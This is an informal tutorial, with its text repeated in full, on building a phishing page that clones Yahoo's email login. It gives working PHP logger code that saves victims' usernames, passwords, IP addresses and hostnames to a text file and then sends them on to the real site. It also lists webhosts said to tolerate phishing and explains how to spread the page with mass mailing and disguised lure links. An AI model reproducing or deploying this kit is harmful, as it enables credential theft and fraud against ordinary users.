The Hosting
Your first going to want to find a webhost that wont automatically shut you down for phishing otherwise what's the point..I suggest making one on some free subdomains which really is a plus for phishing anyway if done correctly it can be very convincing some free webhosts i've found that are good to work with are:
110mb.com
10gbfreehost.com
Now these aren't the only good webhosts to work through phishers with but they are the only ones i've seen now from here it's basic php editing you may want to make an ftp connection to your subdomain through the 'My Network Places' in Windows or a nice ftp client such as cuteftp or quickftp.
-
The Work
Have you confirmed that you can connect via ftp to your host? Yes? good. Now we will actually create our phisher.
From experience in making tutorials you will probably want to open a notepad to take notes, Got it? no? you lazy bastard..Anywho we will be doing an example with Yahoo's email login it's quite simple no flashy .swf's or pictures the first thing we will do is view the source of the login page now copy this all and paste it to a index.php and save it, you can now close the target site. We want to find the command in the php that allows it to POST data so we'll simply do a search in the 'index.php' we made [CTRL+F] for post...You should've found:
<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return hash2(this)">
Good, now see that url
https://login.yahoo.com/config/login?
That's going to be pointing to our php poster so go ahead and replace that url with log.php dont worry about the rest, you may want to do a search for "/ but on the yahoo login page everything is directly linked, but on some pages like paypal there are some images and .swf's that are a link such as "/images/flashyshit.swf" now when you upload this onto your webhost it's gonna look for that and it wont be there so it wont be legit so go ahead and hit replace [CTRL+H] now replace all the "/ with [if we were doing paypal] "http://paypal.com/ that should correct all problems.
-
More Work
We need to find the username and password names why you ask? so we can post the fields to our .txt file through our poster (log.php) so go into the index.php once more and a search for username you should get:
<input name="login" id="username" value="" size="17" class="yreg_ipt" type="text" maxlength="96">
All we need to worry about is the name here it's login so we take our notes that you were supposed to open at the beginning of this tutorial ( I bet you feel like a smartass now :] ) and paste that field's name in there "login" so now we need the password's input name so do a search for password good you found it should look like:
<input name="passwd" id="passwd" value="" size="17" class="yreg_ipt" type="password" maxlength="64">
kai input name here is passwd so put that in your notes aswell now close and save the index.php
-
The Logger And Log
Now we need a poster of sorts, a .php file that will submit the text entered in the username and password fields so let's create our poster we said we'd call it log.php so do it, inside of that we need to post data:
<HEAD>
<script language="JavaScript">
<!--
window.location="SITEURL";
//-->
</SCRIPT>
</HEAD>
?<?php
$username = $_POST['USERNAMEFIELDNAME'];
$password = $_POST['PASSWORDNAMEFIELD'];
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$send = fopen("log.txt", "a");
fwrite($send, "SITEURL\r");
fwrite($send, "Username: $username \r");
fwrite($send, "Password: $password \r");
fwrite($send, "IP: $ip \r");
fwrite($send, "Host: $hostname \r");
fwrite($send, "---------------------------------------------------------\r");
fclose($send);
?>
Now we already know our username and password field names from our notes and our targeturl is http://mail.yahoo.com/ soo...
<HEAD>
<script language="JavaScript">
<!--
window.location="http://mail.yahoo.com/";
//-->
</SCRIPT>
</HEAD>
?<?php
$username = $_POST['login'];
$password = $_POST['passwd'];
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$send = fopen("log.txt", "a");
fwrite($send, "http://mail.yahoo.com/\r");
fwrite($send, "Username: $username \r");
fwrite($send, "Password: $password \r");
fwrite($send, "IP: $ip \r");
fwrite($send, "Host: $hostname \r");
fwrite($send, "---------------------------------------------------------\r");
fclose($send);
?>
And there's your logger now in this logger you see $send = fopen("log.txt", "a"); well now obviously we need to create a .txt document called log.txt personally i change the name because fellow hackers steal your work, but for this tut for we're using log.txt so just create a blank .txt file named log
-
Upload
Finally it's your time to shine time to upload all this BS so get it all together an upload that bitch you may want to make it look good put it in a long named folder like "mail.yahoo.com/email.aspx?ffie=emailconfirmation/index.php" so now your going to have to change the permissions on the log.txt why? you have to allow the person you hooked to access the .txt file to write the info from our poster so change the permissions on it to '777' and click 'ok' now your done.
-
DONE
Your done....now what? well you may want to look into some mass mailing software and some email spider programs all very easy to obtain free you can use scam letters to trick people into going to your site in the letter by making an url in html such as:
<a href="http://PHISHERURL/mail.yahoo.com/email.aspx?ffie=emailconfirmation/index.php">http://mail.yahoo.com/email.aspx?ffie=emailconfirmation</a>
And that's about all you can do advertise and sharpen your social engineering skills
Good luck guys .
Your first going to want to find a webhost that wont automatically shut you down for phishing otherwise what's the point..I suggest making one on some free subdomains which really is a plus for phishing anyway if done correctly it can be very convincing some free webhosts i've found that are good to work with are:
110mb.com
10gbfreehost.com
Now these aren't the only good webhosts to work through phishers with but they are the only ones i've seen now from here it's basic php editing you may want to make an ftp connection to your subdomain through the 'My Network Places' in Windows or a nice ftp client such as cuteftp or quickftp.
-
The Work
Have you confirmed that you can connect via ftp to your host? Yes? good. Now we will actually create our phisher.
From experience in making tutorials you will probably want to open a notepad to take notes, Got it? no? you lazy bastard..Anywho we will be doing an example with Yahoo's email login it's quite simple no flashy .swf's or pictures the first thing we will do is view the source of the login page now copy this all and paste it to a index.php and save it, you can now close the target site. We want to find the command in the php that allows it to POST data so we'll simply do a search in the 'index.php' we made [CTRL+F] for post...You should've found:
<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return hash2(this)">
Good, now see that url
https://login.yahoo.com/config/login?
That's going to be pointing to our php poster so go ahead and replace that url with log.php dont worry about the rest, you may want to do a search for "/ but on the yahoo login page everything is directly linked, but on some pages like paypal there are some images and .swf's that are a link such as "/images/flashyshit.swf" now when you upload this onto your webhost it's gonna look for that and it wont be there so it wont be legit so go ahead and hit replace [CTRL+H] now replace all the "/ with [if we were doing paypal] "http://paypal.com/ that should correct all problems.
-
More Work
We need to find the username and password names why you ask? so we can post the fields to our .txt file through our poster (log.php) so go into the index.php once more and a search for username you should get:
<input name="login" id="username" value="" size="17" class="yreg_ipt" type="text" maxlength="96">
All we need to worry about is the name here it's login so we take our notes that you were supposed to open at the beginning of this tutorial ( I bet you feel like a smartass now :] ) and paste that field's name in there "login" so now we need the password's input name so do a search for password good you found it should look like:
<input name="passwd" id="passwd" value="" size="17" class="yreg_ipt" type="password" maxlength="64">
kai input name here is passwd so put that in your notes aswell now close and save the index.php
-
The Logger And Log
Now we need a poster of sorts, a .php file that will submit the text entered in the username and password fields so let's create our poster we said we'd call it log.php so do it, inside of that we need to post data:
<HEAD>
<script language="JavaScript">
<!--
window.location="SITEURL";
//-->
</SCRIPT>
</HEAD>
?<?php
$username = $_POST['USERNAMEFIELDNAME'];
$password = $_POST['PASSWORDNAMEFIELD'];
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$send = fopen("log.txt", "a");
fwrite($send, "SITEURL\r");
fwrite($send, "Username: $username \r");
fwrite($send, "Password: $password \r");
fwrite($send, "IP: $ip \r");
fwrite($send, "Host: $hostname \r");
fwrite($send, "---------------------------------------------------------\r");
fclose($send);
?>
Now we already know our username and password field names from our notes and our targeturl is http://mail.yahoo.com/ soo...
<HEAD>
<script language="JavaScript">
<!--
window.location="http://mail.yahoo.com/";
//-->
</SCRIPT>
</HEAD>
?<?php
$username = $_POST['login'];
$password = $_POST['passwd'];
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$send = fopen("log.txt", "a");
fwrite($send, "http://mail.yahoo.com/\r");
fwrite($send, "Username: $username \r");
fwrite($send, "Password: $password \r");
fwrite($send, "IP: $ip \r");
fwrite($send, "Host: $hostname \r");
fwrite($send, "---------------------------------------------------------\r");
fclose($send);
?>
And there's your logger now in this logger you see $send = fopen("log.txt", "a"); well now obviously we need to create a .txt document called log.txt personally i change the name because fellow hackers steal your work, but for this tut for we're using log.txt so just create a blank .txt file named log
-
Upload
Finally it's your time to shine time to upload all this BS so get it all together an upload that bitch you may want to make it look good put it in a long named folder like "mail.yahoo.com/email.aspx?ffie=emailconfirmation/index.php" so now your going to have to change the permissions on the log.txt why? you have to allow the person you hooked to access the .txt file to write the info from our poster so change the permissions on it to '777' and click 'ok' now your done.
-
DONE
Your done....now what? well you may want to look into some mass mailing software and some email spider programs all very easy to obtain free you can use scam letters to trick people into going to your site in the letter by making an url in html such as:
<a href="http://PHISHERURL/mail.yahoo.com/email.aspx?ffie=emailconfirmation/index.php">http://mail.yahoo.com/email.aspx?ffie=emailconfirmation</a>
And that's about all you can do advertise and sharpen your social engineering skills
Good luck guys .
